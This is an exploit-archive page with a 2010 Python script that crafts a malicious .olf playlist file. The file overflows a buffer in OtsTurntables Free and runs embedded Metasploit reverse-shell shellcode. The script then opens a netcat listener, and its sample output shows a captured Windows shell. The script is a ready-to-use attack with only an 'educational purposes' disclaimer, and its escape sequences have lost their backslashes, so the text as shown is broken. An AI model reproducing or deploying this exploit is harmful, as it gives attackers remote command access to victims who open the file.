[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Published : 2010-02-16
# Author : mr_me
# Previous Title : iTunes 9.0.1 .pls File Handling Buffer Overflow
# Next Title : Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit
#!/usr/bin/python
#
# ###################################################################
#
# OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Date: 14-01-2010
# Author: mr_me
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on: Windows XP sp3
# Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz
# bad chars: 'x00x0axbdx0dx20'
#
# ** For educational purposes only **
#
# ####################################################################
#
# ~! I want to go back to the matrix !~
#
# mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf
#
# [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit
# [+] Creating exploit file..
# [+] Writing 15000 bytes to awsome-electro.olf.. ph33r
# [+] Send awsome-electro.olf to your target
# [+] Waiting for a shell on port: 4444
# listening on [any] 4444 ...
# 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:OtsLabsLists>
#
import sys, os
def banner():
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit"
if len(sys.argv) < 3:
banner()
print "[?] Usage: " + sys.argv[0] + " <port> <filename>"
sys.exit(1)
port = sys.argv[1]
filename = sys.argv[2]
# windows/shell_reverse_tcp - 310 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
shell = ("x6ax48x59xd9xeexd9x74x24xf4x5bx81x73x13x47x4b"
"x25x9ax83xebxfcxe2xf4xbbx21xcexd7xafxb2xdax65"
"xb8x2bxaexf6x63x6fxaexdfx7bxc0x59x9fx3fx4axca"
"x11x08x53xaexc5x67x4axcexd3xccx7fxaex9bxa9x7a"
"xe5x03xebxcfxe5xeex40x8axefx97x46x89xcex6ex7c"
"x1fx01xb2x32xaexaexc5x63x4axcexfcxccx47x6ex11"
"x18x57x24x71x44x67xaex13x2bx6fx39xfbx84x7axfe"
"xfexccx08x15x11x07x47xaexeax5bxe6xaexdax4fx15"
"x4dx14x09x45xc9xcaxb8x9dx43xc9x21x23x16xa8x2f"
"x3cx56xa8x18x1fxdax4ax2fx80xc8x66x7cx1bxdax4c"
"x18xc2xc0xfcxc6xa6x2dx98x12x21x27x65x97x23xfc"
"x93xb2xe6x72x65x91x18x76xc9x14x08x76xd9x14xb4"
"xf5xf2x87xe3x27x90x21x23x34xc6x21x18xacx7bxd2"
"x23xc9x63xedx2bx72x65x91x21x35xcbx12xb4xf5xfc"
"x2dx2fx43xf2x24x26x4fxcax1ex62xe9x13xa0x21x61"
"x13xa5x7axe5x69xedxdexacx67xb9x09x08x64x05x67"
"xa8xe0x7fxe0x8ex31x2fx39xdbx29x51xb4x50xb2xb8"
"x9dx7excdx15x1ax74xcbx2dx4ax74xcbx12x1axdax4a"
"x2fxe6xfcx9fx89x18xdax4cx2dxb4xdaxadxb8x9bx4d"
"x7dx3ex8dx5cx65x32x4fxdax4cxb8x3cxd9x65x97x23"
"xd5x10x43x14x76x65x91xb4xf5x9a");
exploit = "x41" * 900
exploit += "xebx06x90x90"
exploit += "x46x79x23x01" # CALL DWORD PTR SS:[ESP+2c]
exploit += "x90" * 30
exploit += shell
exploit += "x41" * (15000-len(exploit))
banner()
try:
print "[+] Creating exploit file.."
print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r"
print "[+] Send " + filename + " to your target"
turntable = open(filename,'w');
turntable.write(exploit);
turntable.close();
print "[+] Waiting for a shell on port: " + port
os.system('nc -lvp ' + port)
except:
print "[-] Error: You do not have correct permissions.."